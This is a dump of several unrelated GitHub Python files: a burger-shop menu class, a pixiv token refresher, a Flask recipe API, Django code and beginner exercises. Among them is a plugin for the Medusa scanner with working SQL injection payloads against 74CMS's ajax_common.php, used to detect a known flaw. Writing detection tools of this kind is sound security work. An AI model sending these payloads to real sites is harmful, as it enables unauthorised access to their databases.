(self.get_stock_quantity(ingredient) / count) < quantity:\n\t\t\t\tquantity = self.get_stock_quantity(ingredient) / count\n\t\tself.set_stock_quantity(main_item, quantity)\n\t\treturn\n\n\tdef display(self):\n\t\treturn self._items.values()\n \t\n\tdef print_menu(self):\n\t\tfor item in self._items.keys():\n\t\t\tprint(self.get_item(item))\n \t\t \t\t\n\tdef get_item(self, name):\n\t\treturn self._items[name] \n \t\n\tdef get_items(self):\n\t\treturn self._items\n\t\t\n\t#function that returns the quantity of an item in string format\n\tdef get_stock_quantity(self, name):\n\t\tquantity = self.get_item(name).stock_quantity\n\t\treturn quantity\n\n\t#function that sets the quantity of an item in string format\n\tdef set_stock_quantity(self, name, quantity):\n\t\tself.get_item(name).stock_quantity = quantity\n\t\treturn \n\t\t\n\t#function to refill inventory to full\n\tdef refill_inventory(self):\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"ingredient\":\n\t\t\t\tself.set_stock_quantity(item, 1000)\n\t\t\telif isinstance(self.get_item(item), BaseMenuItem):\n\t\t\t\tself.set_stock_quantity(item, 10000)\n\t\tself.set_main_quantity(\"baseburger\")\n\t\tself.set_main_quantity(\"base wrap\")\t\t\n\t\tself.set_quantity(\"nugget\")\n\t\tself.set_quantity(\"fries\")\n\t\tself.set_quantity(\"orange juice\")\n\t\tself.set_quantity(\"sundae\")\n\t\tself.save_inventory()\n\t\treturn\n\t\t\n\t#function to return a list of mains on the menu only\n\tdef get_mains(self):\n\t\tmains = []\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"main\":\n\t\t\t\tmains.append(self.get_item(item))\n\t\treturn mains\n\t\n\t#function to return a list of ingredients on the menu only\n\tdef get_ingredients(self, type=None):\n\t\tingredients = []\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == \"ingredient\":\n\t\t\t\tif type == None:\n\t\t\t\t\tingredients.append(self.get_item(item))\n\t\t\t\telif self.get_item(item).main_type.find(type) != -1:\n\t\t\t\t\tingredients.append(self.get_item(item))\n\t\treturn ingredients\n\t\n\t#function to return a list of the type measured items given in the input\n\tdef get_measured_item(self, measuredItem):\n\t\tmenu = []\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).food_type == measuredItem and not isinstance(self.get_item(item), BaseMenuItem):\n\t\t\t\tmenu.append(self.get_item(item))\n\t\treturn menu\n\n\t# returns the price of an item given an input string\n\tdef get_price(self, name):\n\t\tfor item in self._items.keys():\n\t\t\tif self.get_item(item).name == name:\n\t\t\t\treturn self.get_item(item).price\n\t\n\t#function to write current inventory out\t\t\t\n\tdef save_inventory(self):\n\t\tf = open(\"inventory.pickle\", \"wb\")\n\t\tpickle.dump(self, f)\n\t\treturn\n\n","repo_name":"houdeanie/c1531-Burger-site","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2087841274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Ascotbe'\n__date__ = '2019/10/11 16:39 PM'\nimport requests\nfrom ClassCongregation import VulnerabilityDetails,WriteFile,ErrorLog,ErrorHandling\n\n\nclass VulnerabilityInfo(object):\n def __init__(self,Medusa):\n self.info = {}\n self.info['number']=\"0\" #如果没有CVE或者CNVD编号就填0,CVE编号优先级大于CNVD\n self.info['author'] = \"Ascotbe\" # 插件作者\n self.info['create_date'] = \"2020-1-6\" # 插件编辑时间\n self.info['disclosure']='2014-09-14'#漏洞披露时间,如果不知道就写编写插件的时间\n self.info['algroup'] = \"74CMSSQLInjectionVulnerabilityExists7\" # 插件名称\n self.info['name'] ='74CMS存在SQL注入漏洞7' #漏洞名称\n self.info['affects'] = \"74CMS\" # 漏洞组件\n self.info['desc_content'] = \"骑士CMS/plus/ajax_common.php全局注入漏洞。\" # 漏洞描述\n self.info['rank'] = \"高危\" # 漏洞等级\n self.info['suggest'] = \"升级最新的系统\" # 修复建议\n self.info['version'] = \"20140709\" # 这边填漏洞影响的版本\n self.info['details'] = Medusa # 结果\n\ndef medusa(**kwargs)->None:\n url = kwargs.get(\"Url\")\n Headers=kwargs.get(\"Headers\")#获取传入的头文件\n proxies = kwargs.get(\"Proxies\")\n try:\n payload = \"/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(1),3%23\"\n payload2=\"/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23\"\n payload_url = url + payload\n payload_url2 = url + payload2\n\n resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)\n resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies,verify=False)\n con = resp.text\n con2 = resp2.text\n code = resp2.status_code\n code2 = resp2.status_code\n if (code==200 and con.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) or (code2==200 and con2.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) :\n Medusa = \"{}存在74CMS存在SQL注入漏洞\\r\\n漏洞地址:{}\\r\\n漏洞详情:{}\\r\\n\".format(url,payload_url,con)\n _t=VulnerabilityInfo(Medusa)\n VulnerabilityDetails(_t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据\n WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果\n except Exception as e:\n _ = VulnerabilityInfo('').info.get('algroup')\n ErrorHandling().Outlier(e, _)\n _l = ErrorLog().Write(\"Plugin Name:\"+_+\" || Target Url:\"+url,e)#调用写入类","repo_name":"xuduofeng/Medusa","sub_path":"Modules/Cms/_74CMS/_74CMSSQLInjectionVulnerabilityExists7.py","file_name":"_74CMSSQLInjectionVulnerabilityExists7.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"7453826284","text":"# Aula 16\n\n# Crie um programa que vai gerar cinco números aleatórios e colocar em uma tupla.\n#\n# Depois disso, mostre a listagem e números gerados e também indique o menor e o maior valor que estão na tupla.\n\nfrom random import randint\nnumeros = ()\nmaior = menor = 0\n\nfor item in range(0, 5):\n aleatorio = randint(1,10)\n numeros += (aleatorio,)\n\n if (item == 0):\n maior = menor = aleatorio\n else:\n if (aleatorio > maior):\n maior = aleatorio\n elif (aleatorio < menor):\n menor = aleatorio\n\nprint(f'''Os números aleatórios são: {numeros}\n{maior} é o maior e {menor} é o menor.''')","repo_name":"strawndri/curso_em_video_python","sub_path":"Mundo 03/Aula 16/ex074.py","file_name":"ex074.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30382748759","text":"#Programa que pida dos numeros\n#Declaracion\nnum1,num2=0,0\nimport os\n\n#Input\nnum1=int(os.sys.argv[1])\nnum2=int(os.sys.argv[2])\n\nfor i in [num1 and num2]:\n#Muestre en pantalla si el primero es mayor\n if(num1>num2):\n print(\"El primer numero\",num1,\" es mayor que \",num2)\n#si el numero 2>numero 1, indicarlo en pantalla\n if(num2>num1):\n print(\"Numero \",num2,\" Es mayor que \",num1)\n#si los dos numeros pedidos son iguales mostrar en patalla\n if(num1==num2):\n print(\"Numero \",num1,\" Es igual que \",num2)\n #if_fin\n#fin_for\n","repo_name":"Kiaradamiancoloma/T07_DAMIAN-MENDOZA","sub_path":"MENDOZA GONZALES/iteracion5.py","file_name":"iteracion5.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17500486707","text":"\nimport json\nfrom pixiv_auth import (\n AUTH_TOKEN_URL, CLIENT_ID,\n CLIENT_SECRET, USER_AGENT,\n REQUESTS_KWARGS,\n print_auth_token_response\n)\nimport requests\nfrom time import time\n\n\nclass refresher:\n \n def __init__(self):\n self.__token:str = None\n self.__load_token()\n pass\n \n # api\n def get_token(self) -> dict:\n return self.__token\n \n def do_refresh(self, refresh_token:str=None) -> dict:\n if refresh_token is None:\n refresh_token = self.__token['refresh_token']\n \n try:\n resp = self.__refresh(refresh_token)\n respjson = resp.json()\n # print(json.dumps(resp, indent=2, ensure_ascii=False))\n self.__token = {\n 'access_token': respjson['access_token'],\n 'refresh_token': respjson['refresh_token'],\n 'expires_in': respjson['expires_in'],\n 'refresh_at': self.__get_unixtimestamp(),\n }\n except KeyError:\n print('Failed to refresh pixiv token.')\n exit(-1)\n except Exception as err:\n print(f'do_refresh() Exception: {err}')\n \n print_auth_token_response(resp)\n self.__write_token()\n return self.__token\n \n # private helper functions\n def __load_token(self):\n try:\n with open('token.json', 'r', encoding='utf-8') as file:\n self.__token = json.load(file)\n except Exception as err:\n print(f'Failed to load tokens. Exception: {err}')\n exit(-1)\n \n def __write_token(self):\n try:\n with open('token.json', 'w', encoding='utf-8') as file:\n json.dump(self.__token, file, indent=2, ensure_ascii=False)\n except Exception as err:\n print(f'Failed to write to token.json. Exception: {err}')\n \n # copy from pixiv_auth.py with a bit modification\n def __refresh(self, refresh_token):\n response = requests.post(\n AUTH_TOKEN_URL,\n data={\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'refresh_token',\n 'include_policy': 'true',\n 'refresh_token': refresh_token,\n },\n headers={\n 'user-agent': USER_AGENT,\n 'app-os-version': '14.6',\n 'app-os': 'ios',\n },\n **REQUESTS_KWARGS\n )\n return response\n \n def __get_unixtimestamp(self):\n now = int(time())\n return now\n\n\n\nif __name__ == '__main__':\n try:\n ref = refresher()\n ref.do_refresh()\n except Exception as err:\n print(err)\n exit(-1)\n\n","repo_name":"Gavin1937/pixiv_token_refresher","sub_path":"refresher.py","file_name":"refresher.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30379660637","text":"from celery import task\nfrom django.core.mail import send_mail\nfrom .models import Order\n\n\n# @task\ndef order_created(order_id, payment_done):\n \"\"\"\n Task to send an e-mail notification when an order is\n successfully created.\n \"\"\"\n order = Order.objects.get(id=order_id)\n subject = f'Order nr. {order.id}'\n if(payment_done):\n message = f'Dear {order.first_name},\\n\\n' \\\n f'You have successfully placed an order at Choco-Stop. ' \\\n f'Your order ID is {order.id}. ' \\\n f'Payment done successfully.'\n else:\n message = f'Dear {order.first_name},\\n\\n' \\\n f'You have successfully placed an order at Choco-Stop. ' \\\n f'Your order ID is {order.id}. ' \\\n f'Please pay by cash on delivery.'\n mail_sent = send_mail(subject,\n message,\n 'chocolateshop111@gmail.com',\n [order.email])\n # print(subject,message,order.email)\n return mail_sent\n","repo_name":"SuryaGitDev/ChocolateShop","sub_path":"orders/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17951118114","text":"import bpy\nimport os\n\nD = bpy.data\n\n\"\"\"\n This little script quicly update images path.\n In this example we tell Blender to use the A: drive instead of network path.\n\"\"\"\n\nwrongPath = r\"\\\\my-wrong-path\"\ncorrectPath = r\"//textures\"\n\nprint(\"+++ path correction +++\")\n\nfor img in D.images:\n img.filepath = img.filepath.replace(wrongPath, correctPath)\n\n# check in the console what's rest to fix\nfor img in D.images:\n if not img.filepath.startswith(correctPath): \n print(\"wrong path: {} {}\".format(img.name, img.filepath))","repo_name":"Vinc3r/Blender-Python-Snippets","sub_path":"blender-2.7-/textures/texture-quick-replace-path.py","file_name":"texture-quick-replace-path.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"34912732880","text":"from flask import Flask, jsonify,request\nimport requests\nimport pandas as pd\nimport json\nfrom pandas import json_normalize\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport time\nimport sqlite3\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return \"Tutor Joes Api\"\n\n\n\n#https://nokin-taro.com/rakuten-recipe-api/\n#https://qiita.com/konitech913/items/7ffa7907a6c03c8909fc\n#https://virtualsanpo.blogspot.com/2020/06/pythonfirebase-cloud-firestorejson.html\n\n#urlの作成\nbase_url = 'https://app.rakuten.co.jp/services/api/Recipe/CategoryList/20170426?' #レシピランキングAPIのベースとなるURL\n\nitem_parameters = {\n 'applicationId': '1057310997502838737', #アプリID\n 'format': 'json',\n 'formatVersion': 2,\n}\n\nr = requests.get(base_url, params=item_parameters)\njson_data = r.json()\n#print(json_data)\n\n# mediumカテゴリの親カテゴリの辞書\nparent_dict = {}\n\ndf = pd.DataFrame(columns=['category1','category2','category3','categoryId','categoryName'])\n\n# 大カテゴリ\nfor category in json_data['result']['large']:\n df = df.append({'category1':category['categoryId'],'category2':\"\",'category3':\"\",'categoryId':category['categoryId'],'categoryName':category['categoryName']}, ignore_index=True)\n\n\n# 中カテゴリ\nfor category in json_data['result']['medium']:\n df = df.append({'category1':category['parentCategoryId'],'category2':category['categoryId'],'category3':\"\",'categoryId':str(category['parentCategoryId'])+\"-\"+str(category['categoryId']),'categoryName':category['categoryName']}, ignore_index=True)\n parent_dict[str(category['categoryId'])] = category['parentCategoryId']\n\n\n# 小カテゴリ\nfor category in json_data['result']['small']:\n df = df.append({'category1':parent_dict[category['parentCategoryId']],'category2':category['parentCategoryId'],'category3':category['categoryId'],'categoryId':parent_dict[category['parentCategoryId']]+\"-\"+str(category['parentCategoryId'])+\"-\"+str(category['categoryId']),'categoryName':category['categoryName']}, ignore_index=True)\n\n\n\n#https://rayt-log.com/%E3%80%90firebase%E3%80%91python%E3%81%A7cloud-firestore%E3%81%AB%E5%80%A4%E3%82%92%E8%BF%BD%E5%8A%A0%E3%83%BB%E5%8F%96%E5%BE%97%E3%81%99%E3%82%8B%E6%96%B9%E6%B3%95%EF%BC%81/\n#Firebaseのrefriを取得\n\n\ncred = credentials.Certificate(\"C:/firebase_myref/myref1-3-firebase-adminsdk-8eoqo-f254d2b63e.json\")\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\ndbname = \"C:/Users/ueda5/AppData/Local/Google/AndroidStudio2021.3/device-explorer/Pixel_5_API_30 [emulator-5554]/data/data/com.example.app_grid13/databases/assets/myref3.db\"\nconn = sqlite3.connect(dbname)\ndocs = conn.cursor() \n\n\nrefri = db.collection('refri')\ndocs = refri.stream()\n\n\n#データフレームを複数作成する\ndf_recipe2 = pd.DataFrame(columns=['foodImageUrl', 'recipeUrl'])\n\ndf_recipe3 = pd.DataFrame(columns=['image', 'url'])\n\n#recipe_test1.json\nfor doc in docs:\n doc=doc.to_dict()\n doc=doc['name']\n #print(doc)\n #docから'name'だけを引っ張りたい\n df_keyword = df.query('categoryName.str.contains(@doc)', engine='python')\n df_keyword2 = df_keyword['categoryName']\n df_keyword2.to_json('recipe_test1.json')\n\n json_open = open('recipe_test1.json', 'r')\n json_load = json.load(json_open)\n\n\n for index, row in df_keyword.iterrows():\n time.sleep(3)\n url = 'https://app.rakuten.co.jp/services/api/Recipe/CategoryRanking/20170426?applicationId=1057310997502838737&categoryId='+row['categoryId']\n res = requests.get(url)\n #firebase_recipe_ranking\n json_data = json.loads(res.text)\n recipes = json_data['result']\n\n #df_recipe2\n for recipe in recipes:\n df_recipe2 = df_recipe2.append({'foodImageUrl':recipe['foodImageUrl'], 'recipeUrl':recipe['recipeUrl']}, ignore_index=True)\n #print(type(df_recipe))\n df_recipe2.to_json('recipe_test2.json')\n\n json_open2 = open('recipe_test2.json', 'r')\n json_load2 = json.load(json_open2)\n\n'''\nfor recipe_image in json_load2['foodImageUrl'].values():\n image2=recipe_image\n\nfor recipeURL in json_load2['recipeUrl'].values():\n url2=recipe_image\n'''\n#2つをまとめてjsonに格納する\n\nfor recipe_image,recipeURL in zip(json_load2['foodImageUrl'].values(),json_load2['recipeUrl'].values()):\n #doc_ref = db.collection(u'recipe').document()\n #doc_ref.set({u'image':recipe2,u'URL':recipeURL})\n df_recipe3= df_recipe3.append({'image':recipe_image,'url':recipeURL}, ignore_index=True)\n #print(type(df_recipe2))\n\n \n df_recipe3.to_json('recipe_test3.json')\n json_open = open('recipe_test3.json', 'r')\n json_load3 = json.load(json_open)\n \n \nbasedir=os.path.abspath(os.path.dirname(__file__))\n#print(basedir)\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///'+os.path.join(basedir,'recipe_db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n# User Table Model \nclass Recipe(db.Model):\n id=db.Column(db.Integer, primary_key=True)\n image = db.Column(db.String(100))\n url = db.Column(db.String(100), unique=True)\n \n def __init__(self,image,url) :\n self.image=image\n self.url=url\n \nclass RecipeSchema(ma.Schema):\n class Meta:\n fields = ('id', 'image', 'url')\n\nrecipe_schema = RecipeSchema()\nrecipe_schema=RecipeSchema(many=True)\n\n#https://stackoverflow-com.translate.goog/questions/44941757/sqlalchemy-exc-operationalerror-sqlite3-operationalerror-no-such-table?_x_tr_sl=en&_x_tr_tl=ja&_x_tr_hl=ja&_x_tr_pto=sc\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\n# Show\n@app.route('/recipe',methods=['GET'])\ndef getAllUser():\n \n #all_recipes=Recipe.query.all()\n #result=recipe_schema.dump(all_recipes)\n return jsonify(json_load3)\n \n@app.route('/recipe/',methods=['GET'])\ndef getUserByid(id):\n recipe=Recipe.query.get(id)\n return recipe_schema.jsonify(recipe)\n \n \nif __name__ == '__main__':\n app.run(debug=True,port=5000)\n\n'''\n@app.route('/recipe',methods=['POST'])\ndef add_user():\n #image=request.json[df_recipe2['image']]\n #url=request.json[df_recipe2['url']]\n \n print(image2)\n \n new_recipe=Recipe(image2,url2)\n db.session.add(new_recipe)\n db.session.commit()\n \n #json_load['Query'] = str(request.args['Query'])\n return recipe_schema.jsonify(df_recipe2)\n'''","repo_name":"uedazxcvbnm/myref_flask1","sub_path":"lib/flask_recipe.py","file_name":"flask_recipe.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25598150584","text":"T = int(input())\nfor test_case in range(1, T + 1):\n num = int(input())\n calc = 0\n\n for i in range(num + 1):\n if i % 2 == 1:\n calc += i\n elif i % 2 == 0:\n calc -= i\n print('#{0} {1}'.format(test_case, calc))","repo_name":"nekopurr/SW_Expert_Academy","sub_path":"Level2/1986_지그재그숫자.py","file_name":"1986_지그재그숫자.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32748197658","text":"class Solution(object):\n def rotate(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n l=len(nums)-1\n p=l\n save=0\n while k>len(nums):\n k-=len(nums)\n for j in range(k):\n save=nums[l]\n for i in range(len(nums)):\n p -=1\n if p==(-1):\n nums[0]=save\n else:\n nums[l]=nums[p]\n l -=1\n l=len(nums)-1\n p=l","repo_name":"PEIPEISHEEP/LeetCode-189-Rotate-Array","sub_path":"Rotate Array超時版.py","file_name":"Rotate Array超時版.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27355441502","text":"from unittest.mock import MagicMock, patch\n\nfrom birdfeeder.timed_aggregator import TimedAggregator, TimedMetricItem, average, summation\n\n\ndef test_create_with_value():\n with patch('time.time', return_value=42):\n item = TimedMetricItem.create_with_value(100)\n assert item.timestamp == 42\n assert item.value == 100\n\n\ndef test_summation():\n values = [2, 4, 5]\n sum_ = summation(TimedMetricItem.create_with_value(i) for i in values)\n assert sum_ == sum(values)\n\n\ndef test_average():\n values = [3, 4, 5]\n avg = average(TimedMetricItem.create_with_value(i) for i in values)\n assert avg == 4\n\n\ndef test_timed_aggregator():\n window = 10\n start = 0\n time = MagicMock(return_value=start)\n aggregator = TimedAggregator(window, aggregation_func=summation, time_func=time)\n\n aggregator.add(value=42)\n time.return_value = start + window + 1\n assert aggregator.aggregated_value == 0\n\n\ndef test_timed_aggregator_average():\n window = 10\n start = 0\n time = MagicMock(return_value=start)\n aggregator = TimedAggregator(window, aggregation_func=summation, time_func=time)\n\n aggregator.add(value=5)\n time.return_value = start + 1\n aggregator.add(value=7)\n time.return_value = start + 2\n aggregator.add(value=6)\n time.return_value = start + 3\n aggregator.add(value=2)\n\n assert aggregator.average_value == 5\n","repo_name":"CoinAlpha/birdfeeder","sub_path":"tests/test_timed_aggregator.py","file_name":"test_timed_aggregator.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"5467134948","text":"import os\nimport time\nfrom io import StringIO\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport pandas as pd\nimport requests\nfrom tldextract import tldextract\nimport sys\n\n\ndef get_domains() -> Tuple[pd.DataFrame, pd.DataFrame]:\n response = requests.get(\"https://tranco-list.eu/download/L294/200000\")\n df = pd.read_csv(StringIO(response.text), header=None, index_col=0, names=['domain'])\n df['tld'] = df['domain'].apply(lambda d: tldextract.extract(d).suffix)\n df['nl'] = df['tld'] == 'nl'\n return df[df['nl'] == True], df[df['nl'] == False]\n\n\ndef get_and_write_domains(target_dir: str, dutch_limit: int = 50, world_limit: int = 500) -> None:\n target_dir = Path(target_dir) \\\n # / time.strftime(\"%Y%m%d-%H%M%S\")\n target_dir.mkdir(parents=True, exist_ok=True)\n dutch_df, world_df = get_domains()\n write_domain_df_to_csv(dutch_df[:dutch_limit], target_dir / f'dutch_top_{dutch_limit}.csv')\n write_domain_df_to_csv(world_df[:world_limit], target_dir / f'world_top_{world_limit}.csv')\n write_domain_df_to_csv(pd.concat([world_df[:world_limit], dutch_df[:dutch_limit]], ignore_index=True), target_dir / f'combined_{world_limit + dutch_limit}.csv')\n\n\ndef write_domain_df_to_csv(df_: pd.DataFrame, file: Path) -> None:\n df = df_.copy()\n df = df.reset_index()\n df.index += 1\n df.domain.to_csv(file, index=True, header=False)\n\n\nif __name__ == '__main__':\n dutch_limit = int(sys.argv[1])\n world_limit = int(sys.argv[2])\n print(f\"Getting top {dutch_limit} .nl domains & top {world_limit} world domains\")\n get_and_write_domains('../resources/input', dutch_limit=dutch_limit, world_limit=world_limit)\n","repo_name":"ptemarvelde/gdpr_cookies","sub_path":"util/top_domains.py","file_name":"top_domains.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22402799110","text":"from app.models.base import BaseTable\n\nclass OrangeData(BaseTable):\n\n def __init__(self):\n self.__database__ = 'mpmds'\n self.__tablename__ = 'MPMDS_ORANGE_DATA'\n super().__init__()\n\n\n def list_pic(self, companyid, divisionid):\n result = []\n message = \"\"\n try:\n data, message = super().list()\n for x in data:\n # if companyid == x[0] and divisionid == x[6]:\n if divisionid == x[6]:\n row = {\n 'companyid': x[0],\n 'employeeid': x[1],\n 'displayname': f'''{str(x[1]).zfill(5)} - {x[2]}''',\n 'gradeid': x[3],\n 'internaltitle': x[4],\n 'companyoffice': x[5],\n 'divisionid': x[6],\n 'divisionname': x[7],\n 'departmentid': x[8],\n 'departmentname': x[9],\n }\n result.append(row)\n except Exception as e:\n print(str(e))\n result = None\n message = str(e)\n\n return (result, message)\n \n\n # def list_pic(self, companyid, divisionid):\n # result = []\n # message = \"\"\n # try:\n # query = \"select a.* from %s a \" \\\n # \"left join mpmit_pic b on RIGHT('00000'+CAST(ISNULL(a.CODE ,0) AS VARCHAR(5)),5) = b.NPK \" \\\n # \"where b.email is not null\" % (self.__tablename__)\n # data, message = self.execute(query, ())\n # for x in data:\n # # if companyid == x[0] and divisionid == x[6]:\n # if divisionid == x[6]:\n # row = {\n # 'companyid': x[0],\n # 'employeeid': x[1],\n # 'displayname': x[2],\n # 'gradeid': x[3],\n # 'internaltitle': x[4],\n # 'companyoffice': x[5],\n # 'divisionid': x[6],\n # 'divisionname': x[7],\n # 'departmentid': x[8],\n # 'departmentname': x[9],\n # }\n # result.append(row)\n # except Exception as e:\n # print(str(e))\n # result = None\n # message = str(e)\n\n # return (result, message)","repo_name":"wayhdyh98/Digital-Approval","sub_path":"app/models/orange.py","file_name":"orange.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41802931246","text":"import os\nimport numpy as np\n# load pickle from dsm, ort_bw and ort_color directories\n#create img directory if not exists\nos.makedirs('img', exist_ok=True)\nfiles = [\"20181121_AMO_020.npy\",\"20201219_GRO_037.npy\",\"20201219_RYB_020.npy\",\"20210713_GRO_030.npy\",\"20210713_RYB_006.npy\"]\nfor file in files:\n dsm = np.load(f\"dsm/{file}\")\n ort_color = np.load(f\"ort_color/{file}\")\n ort_bw = np.load(f\"ort_bw/{file}\")\n print(file)\n name = file.split(sep=\"_\")[1]+file[2:4]\n #plot the dsm, ort_bw and ort_color on the same plot\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n plt.imshow(dsm, cmap='viridis')\n plt.axis('off')\n plt.savefig(f'img/dsm_{name}.png', transparent=True, bbox_inches='tight', pad_inches=0)\n \n \n plt.imshow(ort_bw, cmap='gray')\n plt.axis('off')\n plt.savefig(f'img/ortbw_{name}.png', transparent=True, bbox_inches='tight', pad_inches=0)\n ort_color = np.moveaxis(ort_color, 0, -1)\n plt.imshow(ort_color)\n plt.axis('off')\n plt.savefig(f'img/ortcolor_{name}.png', transparent=True, bbox_inches='tight', pad_inches=0)\n\n\n","repo_name":"radekszostak/river-wse-uav-ml","sub_path":"tools/dataset/generate_vis.py","file_name":"generate_vis.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28433991797","text":"# -*- coding: utf-8 -*-\n\n# python\nimport csv\nimport os\n\n# django\nfrom django.test import TestCase\n\n# leukapp\nfrom leukapp.apps.leukforms.factories import LeukformSamplesFactory\nfrom leukapp.apps.aliquots.factories import AliquotFactory\n\n# local\nfrom ..constants import CREATE_FIELDS, MODELS_LIST\n\n\nclass LeukformCsvFactoryTest(TestCase):\n\n def test_set_parameters_individual(self):\n batch = LeukformSamplesFactory()\n parent = None\n batch.request['Specimen'] = 0\n kwargs, child = batch._update_parameters(\n model='Individual', parent=parent)\n self.assertDictEqual(kwargs, {})\n self.assertEqual(child, 'Specimen')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_specimen(self):\n batch = LeukformSamplesFactory()\n parent = 'individualInstance'\n batch.request['Aliquot'] = 0\n kwargs, child = batch._update_parameters(\n model='Specimen', parent=parent, order=1)\n self.assertDictEqual(kwargs, {'individual': parent, 'order': '1'})\n self.assertEqual(child, 'Aliquot')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_aliquot(self):\n batch = LeukformSamplesFactory()\n parent = 'specimenInstance'\n batch.request['Extraction'] = 0\n kwargs, child = batch._update_parameters(\n model='Aliquot', parent=parent)\n self.assertDictEqual(kwargs, {'specimen': parent})\n self.assertEqual(child, 'Extraction')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_extraction(self):\n batch = LeukformSamplesFactory()\n parent = 'aliquotInstance'\n batch.request['Workflow'] = 0\n kwargs, child = batch._update_parameters(\n model='Extraction', parent=parent)\n self.assertDictEqual(kwargs, {'aliquot': parent})\n self.assertEqual(child, 'Workflow')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_workflow(self):\n batch = LeukformSamplesFactory()\n parent = 'extractionInstance'\n kwargs, child = batch._update_parameters(\n model='Workflow', parent=parent)\n self.assertEqual(kwargs['extraction'], parent)\n self.assertEqual(batch._last, True)\n self.assertEqual(child, None)\n batch_projects = [p.pk for p in batch.projects]\n projects_string = kwargs['projects_string'].split('|')\n projects_string = [int(e) for e in projects_string]\n [self.assertIn(p, batch_projects) for p in projects_string]\n\n def test_write_row_delete_false_last_false_slug_true(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = False\n batch._slug = True\n instance = AliquotFactory()\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, {'Aliquot.slug': instance.slug})\n\n def test_write_row_delete_false_last_false_slug_false(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = False\n batch._slug = False\n instance = AliquotFactory()\n batch._write_row(instance, model='Aliquot')\n self.assertEqual(batch._row['Aliquot.ext_id'], instance.ext_id)\n\n def test_write_row_delete_true_last_false(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = True\n batch._slug = False\n instance = AliquotFactory()\n row = {}\n notused = [\"individual\", \"specimen\", \"aliquot\", \"extraction\"]\n for field in CREATE_FIELDS['Aliquot']:\n if field in notused:\n continue\n column = \"{0}.{1}\".format('Aliquot', field)\n value = eval('instance.{0}'.format(field))\n row[column] = str(value)\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, row)\n\n def test_write_row_delete_true_last_true(self):\n batch = LeukformSamplesFactory()\n batch._last = True\n batch._delete = True\n batch._slug = False\n instance = AliquotFactory()\n row = {}\n rows = []\n notused = [\"individual\", \"specimen\", \"aliquot\", \"extraction\"]\n for field in 